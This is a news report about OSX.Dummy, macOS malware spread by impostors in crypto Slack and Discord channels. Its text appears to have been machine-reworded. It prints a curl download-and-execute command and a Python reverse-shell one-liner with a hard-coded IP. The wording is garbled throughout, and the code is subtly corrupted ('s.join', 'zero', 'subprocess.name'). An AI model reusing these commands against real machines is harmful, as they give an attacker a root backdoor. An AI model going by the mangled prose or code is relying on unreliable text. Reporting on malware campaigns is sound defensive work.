Somebody impersonating directors of cryptocurrency-related dialogue channels on Slack, Discord, and different social messaging platforms has been making an attempt to lure others into putting in macOS malware. The social-engineering marketing campaign consists of posting a script in discussions and inspiring folks to repeat and paste that script right into a Terminal window on their Macs. The command downloads an enormous (34 megabyte) file and executes it, establishing a distant connection that acts as a backdoor for the attacker.
Peter Wardle, a Mac malware skilled, additionally examined the malware and dubbed it “OSX.Dummy” as a result of, as he wrote:
the an infection technique is dumb
the huge measurement of the binary is dumb
the persistence mechanism is lame (and thus additionally dumb)
the capabilities are slightly restricted (and thus slightly dumb)
it is trivial to detect at each step (that dumb)
… and at last, the malware saves the consumer’s password to dumpdummy
The assault, first famous by Remco Verhoef of SANS immediately, downloads its awkward payload from a distant server, makes that file executable, and runs it. It appears one thing like this:
cd /tmp && curl -s curl $MALICIOUS_URL > script && chmod +x script && ./script
The monster binary carries with it a number of libraries, together with Open SSL libraries to encrypt its communications again to the server—a system operating in a knowledge middle of the internet hosting supplier CrownCloud. As soon as it executes, it makes use of the sudo command to make itself owned by macOS’s root consumer. To ensure that this to occur, the sufferer has to enter a password to permit the script to proceed. The script shops that password in a brief file referred to as “dumpdummy”. The script additionally points instructions so as to add itself to the startup checklist for macOS—making itself persistent.
The script’s backdoor code, as Wardle famous, is a recursive Python command-line name with a hard-coded IP tackle for the connection that makes use of port 1337—an apparent leetspeak joke.
python -c ‘import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.join((“220.127.116.11”,1337)); os.dup2(s.fileno(),zero); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.name([“/bin/sh”,”-i”]);’
The attacker’s intent shouldn’t be but clear. However as a result of all of this executes via a Terminal window, it bypasses MacOS’s GateKeeper malware safety, regardless of being unsigned code. And it offers the attacker the flexibility to execute command-line code as the foundation consumer on contaminated Macs. In fact, the code has to beat the frequent sense of the sufferer as nicely.